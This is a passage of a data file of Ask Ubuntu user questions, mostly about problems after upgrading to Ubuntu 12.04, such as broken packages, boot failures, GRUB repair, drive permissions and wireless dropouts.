10.0.32.18-1. dpkg : error processing adobe-flash-properties-gtk : i386 ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : adobe-flashplugin : i386 adobe-flash-properties-gtk : i386 dpkg : dependency problems prevent configuration of adobe-flash-properties-gtk : i386 : adobe-flash-properties-gtk : i386 depends on adobe-flashplugin ( = 11.2.202.233-0precise1 ) ; however : version of adobe-flashplugin : i386 on system is 10.0.32.18-1. dpkg : error processing adobe-flash-properties-gtk : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of adobe-flashplugin : i386 : firefox ( 12.0+build1-0ubuntu0.12.04.1 ) breaks adobe-flashplugin ( < = 11.1.102.63-0precise1 ) and is installed . version of adobe-flashplugin : i386 to be configured is 10.0.32.18-1. dpkg : error processing adobe-flashplugin : i386 ( -- configure ) : dependency problems - leaving unconfigured
128676	launcher and window menu bar missing after 12.04 upgrade	i upgraded from 11.10 to 12.04 and now my launcher menu is missing . i opened terminal using ctrl+alt+t and the menu shows but the gui ( bar ) above that is missing . things like ctrl+tab and image previewer do n't work . i 've tried whats mentioned here but no luck . another screenshot of my gui looks :
128678	lamp-server or xampp ?	looked around for alternatives to wamp , there seem to be two : lamp-server and xampp . what 's the difference between them ? anything in particular to consider before picking one over the other ? thanks .
128680	how to recover a 64-bit ubuntu 12.04 installation ?	using an amd 64-bit system . i upgraded using package manager ( i.e . on-line ) . the desktop freezes after login . how can i recover using a cd version ? i do get a response when selecting `` recovery console '' before logging in . perhaps there is a cryptic command that can help me get the system back on track ? cheers , ... .erik .
128685	live usb/cd is not booting on asus m599x evo motherboard having uefi bios ?	i tried booting both x32 and x64 versions of ubuntu 12.04 . when i choose default/try ubuntu without installing in the boot menu option , the system hangs and the booting stops .
128687	i ca n't set permissions on my external storage drives to make them read/write	i have been using ubuntu 11.10 for a couple weeks . i have 3 external hard drives attached to the system via usb . at present , they are set to read only . the file systems on them are ntfs . i have tried using pysdm , editing the fstab , etc . nothing is working ! here is my fstab as it is now : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sdb5 during installation uuid=84c3df14-0aba-4326-ac0f-c1a99e8749b9 / ext4 errors=remount-ro 0 1 # swap was on /dev/sdb6 during installation uuid=417c09b2-0282-47c3-a373-765f6af9fbb7 none swap sw 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 /dev/sdc1 /media/sdc1 ntfs nls=iso8859-1 , umask=000 , uid=steve 0 0 /dev/sdd1 /media/sdd1 ntfs nls=iso8859-1 , umask=000 , uid=steve 0 0 /dev/sde1 /media/sde1 ntfs nls=iso8859-1 , umask=000 , uid=steve 0 0 this is really annoying me ! i need to be able to use these drives ! any changes i make to the drive lines causes errors when i unmount then try to remount the drives . can anyone help ? thanks !
128690	atheros ar8152 ethernet connection not recognized	tried a lot of different answers people gave around the web ... none of them worked i get wireless internet and all ... . but whenever i tried going wired it does n't even recognise the option of a network . got a toshiba leptop , ethernet adapter- ethernet controller : atheros communications inc. ar8152 v1.1 fast ethernet ( rev c1 ) running ubuntu 12.04 after i thought that upgrading from 11.10 will solve it ... . tried doing sudo ifconfig eth0 up sudo ifconfig eth0 down then sudo ifconfig eth0 down sudo dhclient -r eth0 sudo ifconfig eth0 up sudo dhclient eth0 still nothing tried going to gedit and adding the eth0 and loopback manually ... still nothing ... anyone ? ! ... wired connection works on the windows i run for junk stuff needed to be done with it ( like lol or other win only games i sometime play ) so the problem is one or another definition i have probably ruined with my horse playing with this os settings xd can anyone help me ? ... edited : tried working with a cellular modem to check if that works . does n't . looks like the eth manager is n't working . anyone ?
128693	why is chinese text displaying strangely ?	i just upgraded to 12.04 and should have pretty default settings , yet chinese text is displaying inconsistently . in the example below , for instance , 九 and 山 ( two out of three characters ) look as expected , but 龙 looks like it 's in a different font , or is boldfaced , or is somehow antialiased differently than the others . why does this happen , and how can i fix it ?
128696	ca n't block touchpad on a toshiba c660	i recently updated to ubuntu 12.04 and i ca n't enable/disable my laptop touchpad . it 's a bug ? i have a toshiba c660 . i block my touchpad with fn + f9 . in ubuntu 11.04 worked . i guess that , since ubuntu 11.10 stopped working ( i did n't try to block my touchpad in ubuntu 11.10 cause i had it for 3 days ) .
128698	cairo dock cant find plugins ?	well i restarted my computer trying to fix a cpu issue.when i loaded back up my cairo dock says cant find its plugins so it closed out ? anyone know how to fix this as well ? once again i just , i guess you can say , upgraded to 12.04
128707	partitioning suggestions	today i am going to install a clean ubuntu 12.04 . right now i am running windows 7 home premium 64 bit . i am going to dual boot ubuntu . also i am using a 120 gb ssd . my question is can you help me to manage my partitions . right now with windows 7 i have 102gb free space ( total 119gb ) i am going to create a partition for ubuntu . but i dont know how much space do i have to allocate to it . also i have an externall hdd which i keep my large files in it . is there a possibility to create a /home partition in that hdd ? /home partition keeps user data ( downloads etc ) i think and i dont want to waster my ssd 's space for it . also i have 16gb ram equipped . do i have to create a partition for swap area ? finally , is it also necessary to create /boot partition ? thank you . ahhh forgot to tell . how much do i have to allocate for `` / '' also ?
128710	hardlink or symlink a portable hdd as webroot ?	i 'm setting up a local development environment for our server , and ( due to capacity limitations on my ssd ) i need to use an external drive as my webroot ( /var/www in my case ) . the real question is , should i hardlink this directory or symlink ? if i symlink or hardlink , will my computer remember the drive ( regardless of usb ) next time it is plugged in , or will i have to renew my link ? is there a best practices method for using longterm external storage as an internal resource ? lastly , how would i link this up under my nautilus desktop launcher ? ( nautilus-home.desktop ) -- would i have to link a link in / ? not sure if this is the right road to pursue , but i added # portable on /dev/sdc1 uuid=a8ff783b-017e-462c-b995-708f8823bdc3 none ext4 defaults 0 0 to /etc/fstab where uuid is the uuid of my external .
128722	sshfs very slow in 12.04	i clean-installed 12.04 after using 10.10 . when using sshfs , everything is now very slow . ( i am on very fast ethernet , and also tried on wireless ) . e.g . if i : sshfs user @ xxx.yyy.zzz : /home/user/directory ~/directory cd ~/directory nautilus . nautilus will take almost a minute to open . or if i open a file with gedit or geany it also takes nearly a minute . these things used to take a couple seconds when i did them in 10.10 . any ideas ? edit : to clarify a few things - ssh itself is quite fast . i 've done an identical sshfs on the same network from an ubuntu 10.04 machine and it is quite fast . on 12.04 , everything in the sshfs mounted directory is slow - even to just 'ls ' is very slow . even tab completing a command is very slow when not referring to the directory contents .
128726	unity problem after upgrading to 12.04 ( blank desktop , no dash , no menu bar )	i have updated ubuntu to 12.04.the process completed without any error but after restarting i could log in to my account but it showed an empty desktop left . i read all related questions in askubuntu and tried all the answers but nothing worked properly . i found some answers using * alt+ctrl+f1* but when i pressed this buttons the desktop was gone and i was left with a message on the monitor saying `` out of range 92.6khz / 58hz '' so i ca n't use the answers with those keys.. i had that problem when i upgraded to 11.04 . when i start my system after the motherboard startup screen came the above message comes and it lasts till the log in screen appears . there is no other problems apart from this error message . please help me with these problem .
128727	broken upgrade from 11.10 to 12.04	i have 11.04 ( upgraded to 11.10 , i think ) installed along with windows 7 64bit using wubi . i tried to upgrade to 12.04 when the update manager told me it was available . it downloaded all the packages but then hung at the very beginning of the actual update routine . i opened the terminal from the update manager and hitting enter a couple of times got the process started again . after an hour or so ( maybe more ) , the last line on the terminal read something like `` process halted , too many errors '' and there was a restart button present . i restarted and got a login screen that was barely functional . when i did log in i got a blue screen only . ctrl-alt-del closed that login session but there were only a couple of broken icons at the top right of the screen . i did a hard reset and have not tried to log in to ubuntu again . if i download the 12.04 iso , will it wipe out the broken upgrade ?
128730	what are ubuntu one 's security measures ?	tell me how ubuntu one handles security . is my data encrypted when stored on ubuntu servers ? who holds the key ? do ubuntu one employees have access to my data ?
128732	hide program entry 's in sound indicator	how to hide the entry of programs in the sound indicator , ubuntu 12.04 ( spotify , vlc ) thanks
128734	can i run ubuntu live from a usb flash-drive without destroying the data on it ?	i already have a number of files on a flash drive ( 8 gb ) that i would prefer to keep , but i would like to try ubuntu even if merely for the aesthetics . i use windows xp . i know that it 's definitely possible to run ubuntu from a bootable drive like my flash drive to try ubuntu but i would much rather keep my files intact not only on my flash drive but also my hard drive , if that 's possible . i also want to know if it 's entirely possible that while running ubuntu from the usb if i can switch back to windows while my computer is still on . if i 'm missing something , please let me know . i 'm very grateful for any assistance in this matter .
128738	when i launch an app , the focus does n't move to the opened app	let 's say i have gthumb open , and then launch nautilus from the unity launcher ( in 12.04 ) . why does it sometimes not focus the mouse on nautilus , which i just launched ? instead , the focus remains on gthumb while nautilus opens in front of gthumb ( and not being focused on ) . is this correct behaviour ?
128744	where is the antivirus ?	friends , i didnâ´t find antivirus in this new version . i updated into the ubuntu and not from a separated disk . thank you .
128747	only half of screen used and mouse artifacts displayed	this may be a duplicate , but i have not found a solution as yet . when i boot the computer , only the bottom half of the login screen is displayed on the top portion of the computer screen . dragging the mouse around the screen causes artifacts to be displayed . i am able to log in , but still only see the bottom half of the display shown on the top half of the screen . computer : acer asprie ao751 os : ubuntu 12.4 lts video : intel system controller hub ( schpoulson ) graphics controller video driver in use : gma 500 grub : `` ... i915.modeset=1 quiet splash acpi=force '' if i log in then logout and back in immediately , i will get the full screen display as i should . if i switch to tty ctrl+alt+f1 , login and run sudo restart lightdm i can switch back to the gui and will have the full screen display . i have the same issue using either the netbook display or external display .
128748	how can i know whether a serial cable adapter works with linux	i am looking at getting one of those usb-to-serial cables , but i just want to make sure it will work fine under linux , before buying it . is there a list of brand names or processor ids that are known to work under linux ?
128750	configuring a vpn connection with network manager	i 'm on xubuntu and i just want to make a simple modification in the configuration of the network-manager for the openvpn connection , and it requires me to authenticate . here is what is going on : i go in the network-manager applet , i click on `` vpn '' , then `` modify '' , then i uncheck the box `` connect automatically '' , but i ca n't click on apply , and when i hover the mouse over the `` apply '' button it says i should authenticate . more importantly the vpn connection works when i first set it up , but as soon as i restart the computer , my vpn connection fails and i am unable to make modifications to the configuration of the vpn in gnome network-manager .
128751	how to boot with no splash screen	ubuntu 11.10 desktop up to date ( gnome 3 ) to prevent answers in haste , please notice that grub_cmdline_linux_default= '' '' is set in /etc/default/grub tried also grub_cmdline_linux_default= '' acpi=off '' this removes most of the ubuntu splash screen and shows most of the messages . however , just after the bios launches the operating system , ubuntu starts by `` preparing '' the splash : the screen is ubuntu-colored for about 1 second ( plain color , looks somewhat like the default color after a login ) . during this 1 second some messages are displayed that can not be seen . i would n't care much , but unfortunately during 50 % of the boots , and during this very second , ubuntu asks something ... do n't know what since i can not see the messages . so i do control-d ( tried ^d once and it worked , so i keep doing it again ) and the messages page is back and immediately cleared ( the messages before the ^d can be seen for a split second - i.e . ca n't see them ) and ubuntu resumes the boot normally . unfortunately dmesg does n't show what was asked during that second . nothing in the logs . but i 'd like to know what happens . so the question : is there a way to prevent that pre-splash colored page that hides the messages for 1 second to appear ?
128754	inconsistent gtk theming since upgrade	i 've upgraded from 11.10 to 12.04 . i was using gnome-shell in 11.10 and still am on the current install . i 've noticed an inconsistency between the themes of applications - some appear black whilst others appear white , like this : nautilus is appearing in the white theme , whilst movie player is in black . adwaita is the theme that 's selected for the gtk+ and window themes .
128763	midi files not working on rhythmbox nor vlc	rhythmbox 2.96 does n't run any midi file on ubuntu 12.04 , even after installing gstreamer and ubuntu restricted extras . rhythmbox-message : missing plugin : gstreamer|0.10|rhythmbox-metadata|audio/midi decoder|decoder-audio/midi [ 0xb5504e40 ] main decoder error : no suitable decoder module for fourcc `midi ' . vlc probably does not support this sound or video format .
128772	ubuntu 12.04 x64 installer freezes/hangs	so i tried to do a fresh install on my desktop of the new 12.04 release . it boots fine from the usb and passes the pink screen but right after i have to select the language the mouse feedback is slow or freezing and i ca n't click on anything . sometimes on the upper right corner i get a notification that wireless networks are available . it seems i have a similar issue with this post : ubuntu 12.04 install hangs on dell latitude d610 . some of the hardware specs : intel core i-7 980 6-core gulftown , nvidia gtx580 and a wi-fi card linksys wmp600n wireless-n adapter .
128775	problem with wine on kernel 3.2.0	i 've been using playonlinux to play some steam games without any problem on ubuntu 11.04 and 11.10 . i recently upgrade to the new ubuntu 12.04 , the upgrade whent without problems . i then try to launch a game . the steam windows launch as ussual , but for some reason the games wo n't open . they simply do n't open , no error dialogue whatsoever . i then try opening ubuntu with an old kernel ( 3.0.0-17 ) , this time the games work as usual . i wonder if there was a problem during the kernel installation . is there a way to create a `` log '' to know what is going on when i launch a game in the new kernel ? if there is no solution for this , how can i make the old kernel the default option in the bootloader so i do n't have to look for it everytime ? thank you . note : both kernels are generic-pae
128776	how do i tell chromium to save a torrent file instead of starting transmission ?	when i donload a torrent file in chromium , it starts with transmission . but i want it to save on downloads folder . where can i configure it ? i am on natty
128780	ubuntu 12.04 & mac os x - grub rescue prompt set commands made permanent ?	i recently re-installed my mac os x partition . this somehow messed up my entire partition scheme it seems . first i got dropped to the grub rescue > prompt when trying to boot ubuntu . i had never having seen it before and help command was not recognized , so i started googling . i ended up reading most of the grub recovery documentation . i made it boot by using the set command to set root and prefix variable , then loaded normal mode plugin and ran it . it presented me with the normal grub boot menu , and i booted ubuntu just fine . as the documentation also states these changes are not permanent and i have to edit /boot/grub/grub.cfg - more specifically it states that i have to ensure variables search , linux and intrd variables . my problem is with trying to edit this file , my ubuntu installation fails to reboot . after some wait time , i shut it down the hard way . when i then try to boot again , i 'm back at the grub rescue > prompt again ... so to make ubuntu boot i use these commands : set prefix= ( hd0 , gpt6 ) /boot/grub set root= ( hd0 , gpt6 ) insmod normal normal - > select ubuntu when editing /boot/grub/grub.cfg the section i 'm supposed to edit i edit like this ( i think it 's the search line making the screw up , but i can not figure out what i may delete ) : edit : removed lines to make the edited lines more readable ! unedited entry : set root= ' ( hd0 , gpt6 ) ' search -- no-floppy -- fs-uuid -- set=root ebba50e2-d298-4764-afb5-463c47532158 linux /boot/vmlinuz-3.2.0-23-generic root=uuid=ebba50e2-d298-4764-afb5-463c47532158 ro acpi_backlight=vendor acpi_osi=linux quiet splash pcie_aspm=force $ vt_handoff initrd /boot/initrd.img-3.2.0-23-generic edited entry : set root= ' ( hd0 , gpt6 ) ' search -- no-floppy -- fs-uuid -- set=root ebba50e2-d298-4764-afb5-463c47532158 echo 'loading linux 3.0.0-14-generic ... ' linux /boot/vmlinuz-3.0.0-14-generic root=/dev/sda6 ro acpi_backlight=vendor acpi_osi=linux echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.0.0-14-generic i think that i edited the last section in ( the ubuntu recovery menu entry ) correctly . the first entry looks ( ubuntu normal mode ) like the grub.cfg file itself wants it to look ? which is correct ? my question now is , is this change correct ? - and will i have to do the same for every menu entry ? ; ) nb . after this not working i tried sudo grub-install /dev/sda6 - but i get an error saying this is a partition , and embedding is not supported - this is noob info since i have not researched this part enough yet , just thought it might bring some useful information..
128781	will ubuntu go faster with ubuntu 2d instead of ubuntu 3d ?	i tried both ubuntu 3d and 2d , and it looks as if it goes fast in both , except when i open the dash menu ( in 3d ) , it goes too slow . if i resize the dash , it goes a little slowly , but not too much . is it normal ? will ubuntu run faster with ubuntu 2d ( i do n't like 2d , i like much more ubuntu 3d ) ?
128782	internet data card slow in ubuntu 11.10	i am using a mts data card which promises up to 3.1 mbps , but it gives me only 0-4 kbps . is this an ubuntu problem ?
128783	guitar recording	i am a musician and i am fairly new to ubuntu . i am running ubuntu 12.04 on a dell inspiron 6000 . i have been looking for a reliable and good mixer/recorder for my guitar so i can record original stuff . i have tried audacity and ardour both with and without front end programs such as rakarrack . the problem i am having is that i have a lot of distortin when i am playing clean and an obvious 60 hz hum when i am both clean and distorted . i 've tried plugging in my guitar directly into the usb interface that i have and that does n't help . i have also used a boss ds-1 distortion pedal and a marshall mg15dfx as a preamp before the usb interface as well with no luck . i ca n't seem to get the preamp on the programs adjusted . the usb interface i am using is a behringer ucg102 guitar/usb interface guitar link . does anyone have any suggestions for me ? thanks .
128785	lock screen - password incorrect	i have upgraded ubuntu to 12.04 and now there is a problem in logging in after lock screen : it says the password is incorrect even though i provide the valid password . i found a temporary solution by switching the user and logging in again with the same user .
128792	unendable question c or c++	got a question related to programming . i was planning to choose one more language , besides java , and stuck between choosing c or c++ . i am planning to create apps specifically for ubuntu with gui ( graphical user interface ) like ( wine , bumblebee and etc ) so what is your recommendation ? which one should i learn c or c++ ? if you can , please also explain what language is orientated on what ? thank you very much i appreciate your answers !
128794	intel pro/wireless 3945abg drops wireless and forgets wireless pass key every 10 seconds	long time ubuntu user here . i usually use www.ubuntuforums.org but i thought i would something here . anyway i recently upgraded to ubuntu 12.04 with my lenovo x61s laptop . immediately after starting up , i noticed that the wireless connection drops and forgets the wireless keys about every 10 to 15 seconds . so every time i finish entering the wireless password , i can wait 10 seconds , and i get booted from the network and am prompted again for the pass phrase . obviously there is a problem here , and i have noticed a lot of other questions on this forum about this . the only real answer i saw was doing : sudo iwconfig wlan0 power off but when i do that i get this error : error for wireless request `` set power management '' ( 8b2c ) : set failed on device wlan0 ; operation not supported . and i know my wireless card is using wlan0 for the connection . please any help is greatly appreciated ! ** edit ** i just restarted the new install for the first time , and now i am on a different wifi network , and the wireless connection seems to be working . will update with any changes . ** update ** so last night i shut down the computer and brought it home . the wireless performed flawlessly on my home network . i brought it back to the office , where i had the original problems , and still i get kicked off the wireless network every 15 seconds ... it must be a problem with the network instead of with ubuntu . thanks for the help everyone ! but i think my ubuntu installation is working correctly ! here is the output from lspci -vv for the wireless controller : 03:00.0 network controller : intel corporation pro/wireless 3945abg [ golan ] network connection ( rev 02 ) subsystem : intel corporation device 1010 physical slot : 3 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr+ fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 46 region 0 : memory at dfcff000 ( 32-bit , non-prefetchable ) [ size=4k ] capabilities : < access denied > kernel driver in use : iwl3945 kernel modules : iwl3945
128798	how to use eclipse with the jdks provided by 12.04 ?	i updated to ubuntu 12.04 and now eclipse does not accept openjdk 6 in /usr/lib/jvm anymore . i tried to install openjdk 7 and it did create two folders in /usr/lib/jvm , but neither is accepted by the eclipse jdk dialog . edit : i am referring the the jdk that is used to compile and execute the written programs . not the jre used to run eclipse . this especially means that using the proprietary jdk is not an option for me .
128802	ubuntu 12.04 wo n't boot from usb	i downloaded ubuntu 12.04 , then using the tool startup disk creator i made the live usb . i checked that it 's bootable device boot start end blocks id system /dev/sdb1 * 62 15635593 7817766 c w95 fat32 ( lba ) now on my lap top it boots nicely , but on two other machines that do n't have any installation of ubuntu ( no grub ) it does n't boot . i changed the booting order so that usb is before hdd . so i think i did everything i know , but no luck . how can i use this usb drive on other devices that do n't have any previous ubuntu installation .
128803	the video lens in unity is not showing up	i recently upgraded from ubuntu 11.10 to 12.04 lts . the unity launcher dosent show the video lens .
128805	failed partitioning , can i get those 17gb back ?	i used the ubuntu text installer and went ahead and used the guided partitioner , it froze after partitioning about 17gb , i ca n't find it in gparted or the windows 7 partition manager . when i retry the partitioning with the live usb ( gui install this time ) it only recognizes those 17gb . could i install there and perhaps expand it from there ? my first priority would be to merge those lost 17gb back into my main partition
128814	package system is broken - i need to fix ... ca n't add or remove apps	i installed ubuntu 12.04 and it was working fine . installed gimp 2.6 and it was working fine . then installed gimp 2.8 beta and it broke my package catalog . i can not remove gimp nor anything else and can not add any new updates because it is broken . any default repair available to me during boot up or using the software manager does not work . here is my error message ... installarchives ( ) failed : ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 180355 files and directories currently installed . ) preparing to replace gimp 2.6.12-1ubuntu1 ( using ... /gimp_2.8.0~rc1-0precise0~ppa_i386.deb ) ... unpacking replacement gimp ... dpkg : error processing /var/cache/apt/archives/gimp_2.8.0~rc1-0precise0~ppa_i386.deb ( -- unpack ) : trying to overwrite '/usr/lib/gimp/2.0/plug-ins/file-xmc ' , which is also in package gimp-plugin-registry 3.5.4-1 no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) processing triggers for man-db ... processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... errors were encountered while processing : /var/cache/apt/archives/gimp_2.8.0~rc1-0precise0~ppa_i386.deb this is another error when trying to use the software manager repair option ... the package system is broken ... check if you are using third party repositories . if so disable them , since they are a common source of problems . furthermore run the following command in a terminal : apt-get install -f apps can not be added or removed until the package catalog is repaired . any help will be much appreciated as i do not want to reinstall ubuntu 12.04 , it was a long process . thanks , dan
128816	ubuntu 12.04 upgrade ( from 11.10 ) removed all packages installed	i upgraded from ubuntu 11.10 to 12.04 using a bootable usb . after the upgrade , all non-default packages from 11.10 are gone . for example , i did not have chromium , eclipse etc . although , i could see these in the history in the `` ubuntu software center '' . is there any way i can retrieve all these packages ( even reverting back to 11.10 is also fine with me ) ? what could be a possible reason for this ( we plan to upgrade a few more machines ) ? during the upgrade process , i had unchecked the box which asked permission to look online for upgrade/packages . co
128817	ubuntu software center 12.04 does not install software	i am new to ubuntu , and i have just installed ubuntu 12.04 on a computer . i am using an automatic proxy server . when i select a software package to install and input my password , the progress icon displays for a few seconds , and then it stops . i tried to install different programs , and i always had the same problem . i can browse the web with firefox , so i know i have a network connection . i do not see any errors or anything . what should i do ?
128819	problem installing parallels tools	i am a new user of ubuntu . i installed 12.04 on my mbp . but i can not install parallels tools . i tried to follow every process that i found here . can anyone please help me ? nayan
128823	remove outdated packages post-upgrade ?	i recently upgraded from 11.10 to 12.04 lts , however due to time restrictions , i had to skip the step where outdated packages are removed . is there a way for me to easily do this after the whole upgrade process has been completed ?
128826	system freezing mid upgrade ( to 12.04 )	i 'm in the process of upgrading to 12.04 ( via command line , from 11.10 ) . everything was downloaded and it was happily unpacking and replacing packages when my system froze . i can move my mouse , but clicking on anything gets no response , and the display is not changing other than the mouse moving . what can i do ? i 'm guessing simply holding down the power button until it turns off is a bad idea , but i do n't know what else to do that would get things moving again . ( i could n't find this question , but if it has already been asked and answered then a link would be helpful . ) thanks !
128830	amd64 virtual machine in virtualbox	i have ubuntu 12.04 $ lsb_release -rc release : 12.04 codename : precise $ uname -a linux pablo-desktop 3.2.0-20-generic # 33-ubuntu smp tue mar 27 16:42:26 utc 2012 x86_64 x86_64 x86_64 gnu/linux i have installed virtualbox 4.2 , i try make a virtual machine with debian amd64 http : //cdimage.debian.org/debian-cd/6.0.4/amd64/iso-cd/debian-6.0.4-amd64-netinst.iso but only work with a debian i386 http : //cdimage.debian.org/debian-cd/6.0.4/i386/iso-cd/debian-6.0.4-i386-netinst.iso why ?
128841	internal & microphone jack not working on hp pavilion dv1000 laptop	i 've been using this laptop with ubuntu/ ( & variants of ubuntu ) for three or four years . i 've never been able to get the microphone to work - internal or the jack - though i 've followed a variety of leads . the strange thing is that if i plug in a mic , while audacity ( or similar app ) is recording , something like a click can be heard but nothing else . the mic seems to be recognized , but i 've never been able to record . i 'd really like to use this laptop with skype ( and with the microphone in general ) . currently using : xubuntu 11.10/ubuntu 12.04 dual partition more details : using xubuntu 11.10 . if i use pulse audio volume control and crank the left & right microphone volume bars as far as they will go , audacity will record what clementine is playing , but it is barely , barely , barely audible . i 've also cranked the volume in alsamixer , but this does n't help . the solution offered for the hp pavilion dv1000 and skype , offered here , no longer appears to work .
128843	disable < super > -s ( i.e . < mod4 > -s ) keyboard shortcut in 12.04	ever since upgrading to 12.04 , i 've lost my custom super-s shortcut that i 've been using through xbindkeys . moreover , assigning super-s to commands using the `` keyboard shortcuts '' settings panel fails to take effect . i am assuming some part of 12.04 ui is stealing that binding ; i am running xmonad using gnome 's fallback mode , so i have no idea what ( if anything ) super-s is supposed to do on 12.04 . what is stealing the super-s binding and how can i stop it ?
128848	high cpu usage while playing flash	when i play video on youtube cpu usage rises to 100 % in both firefox and chrome . what i 'm running : processor intel core2duo e4500 2 x 2.2ghz ubuntu 12.04 amd64 with latest updates flash plugin adobe-flashplugin 11.2.202.233-0precise1 firefox 12.0+build1-0ubuntu0.12.04.1 google chrome 18.0.1025.162 is this normal ? and what can i do with this ?
128849	how do i get a laserjet m1212nf mfp working ?	i am trying to install a multifunctional printer laserjet m1212nf mfp on ubuntu 12.04 . i downloaded and install the hplip indicated by the official web site . at the end of the installation i chose reboot the whole system and next i call hp-setup in the terminal ( as normal user and then as root ) . after select in the dialog box my printer i got the following error : searching ... ( bus=usb , search= ( none ) , desc=0 ) < br > /traceback ( most recent call last ) : < br > file `` /usr/share/hplip/ui4/setupdialog.py '' , line 1255 , in nextbutton_clicked < br > self.showaddprinterpage ( ) < br > file `` /usr/share/hplip/ui4/setupdialog.py '' , line 690 , in showaddprinterpage < br > self.readwritefaxinformation ( ) < br > file `` /usr/share/hplip/ui4/setupdialog.py '' , line 1079 , in readwritefaxinformation < br > self.fax_name_company = unicode ( d.getstationname ( ) ) < br > unicodedecodeerror : 'ascii ' codec ca n't decode byte 0xc3 in position 20 : ordinal not in range ( 128 ) i think at this stage the plugin should be downloaded , but it is not working . any suggestion on how to solve this problem ? edition : after running hp-toolbox i got the following error message : unable to communicate with device ( code=12 ) : hp : /usb /hp_laserjet_professional_m1212nf_mfp ? serial=000000000st10hpqsi1c
128855	how to save screenshots as jpg automatically ?	i want to make all screenshots i take jpeg automtically -- not png . i am using ubuntu 12.04 . thanks a lot .
128857	turn off unity feature ?	is there a way to turn off the `` bug `` in unity where the windows go full screen when you touch them to the edge of the screen . this bad idea really bugs me .
128863	12.04 breaks lenovo y560	i had 11.10 working great on my lenovo y560 , but upgrading to 12.04 has been a disaster -- mostly because i ca n't get the mouse cursor to move , and most of the keyboard is useless too ( of course i 've tried plugging other keyboards and mice in ) -- so i ca n't do a thing . ( this of course stops me from being able to see if there are any other problems too . ) i tried downloading the precise iso ( amd64 because this is a 64 bit machine ) and installing from the cd -- everything works fine from the cd , and then on first reboot -- back to no-can-do-anything due to crippled mouse and keyboard . help ! and beware ! !
128870	wireless dropping with an intel centrino wireless-n 1030	a friend of mine has the same problem like many other users with ubuntu precise . with ubuntu 12.04 wireless is dropping sometimes . he has to reconnect to the wifi ssid . this is the relevant output of such a drop : http : //fixee.org/paste/8hwpt89/ would be nice to get help if someone knows why this occurs . info the network hardware is the following : http : //fixee.org/paste/tu9x728/ i post this as links to keep the question short and clean update 2nd of may here you have more dmesg informations : http : //fixee.org/paste/tkv95th/
128871	ubuntu will not boot following upgrade mishap	during the upgrade to ocelot , my system crashed and shutdown . following this , the system would not boot and i fond instructions to complete the upgrade and update throught the root . this allowed me to proceed as far as the logo screen , with the system freezing immediately following this ( usually after the battery check , but occasionally following other checks ) . i have a 9.06 disk which i tried to live boot from , but even this is simply grinding to a halt on a blank screen with a flashing cursor . can anyone help me to get this system back on its feet , or at least help with advice on salvaging valuable files from the hdd . note : the disk does n't even seem willing to run an install or a live boot
128880	how to permanently switch of kde power management warning about battery recall	i have kubuntu 12.04 installed . each time i boot i receive a notification that the battery i am using has been recalled . this is not actually the case , as the recall does n't apply to t61 model of thinkpad . the message looks like this : i would like to permanently dismiss this notification . i have tried : copying /lib/udev/rules.d/95-upower-battery-recall-lenovo.rules to /lib/udev/rules.d/96-upower-battery-recall-lenovo.rules and modifying some of the logic in there . note the higher number , intended to take priority over rule in /lib/udev , but it does n't appear to . modified `` /apps/gnome-power-manager/notify/perhaps_recall '' property to be unchecked using gconf-editor how do i get rid of this annoying warning ?
128882	fresh install of 9.10 on older hardware - but no software is available ! what can i do ?	i have a toshiba ss 1610 from 2004-ish . i picked it up for about $ 300 three years ago and it is still going strong . it 's an exceptional piece of hardware . it was a little slow , but about two years ago i swapped out its hard drive with an ssd and now it runs like a dream . the only thing is , it wo n't run any ubuntu system past 9.10 . and my wireless adapter wo n't run on 9.04 . so if i want to keep wireless ( which is a necessity for me ) , i 'm stuck with 9.10 . the only thing is , i did a reinstall of the os recently , and all of my software sources are now gone . so i ca n't install much , if anything . i ca n't even install gnome do . i know 9.10 is n't a long-term support release , but is there any way for me to maintain this machine ? even downloading .deb files ( 2009 versions , say , of opera ) , i 'm running into unsatisfiable dependencies and ca n't install a lot of things that way . any advice would be very much appreciated . thanks !
128896	indicators for ubuntu 12.04	please post available indicators that work in new lts ubuntu version 12.04 . most of indicators posted here : what application indicators are available ? are n't available in 12.04 ps : although indicator-multiload can be run in 12.04 , that patched work does n't look like it belongs in unity indicators however bold this may seem against all those votes in liked question - it 's for gnome panel , it does n't look at all as unity indicator , imho
128904	does ubuntu 12.04 work in virtualbox on a macbook pro ?	i want to try out the newest ubuntu on my macbook pro without having to install it to bootcamp , does anyone know if the newest ubuntu works on virtualbox ? thanks !
128913	slow apt-get update in 12.04 new instalation	i take long to make apt-get update , is it a momentary situation that servers are saturated or is a permanent situation ?
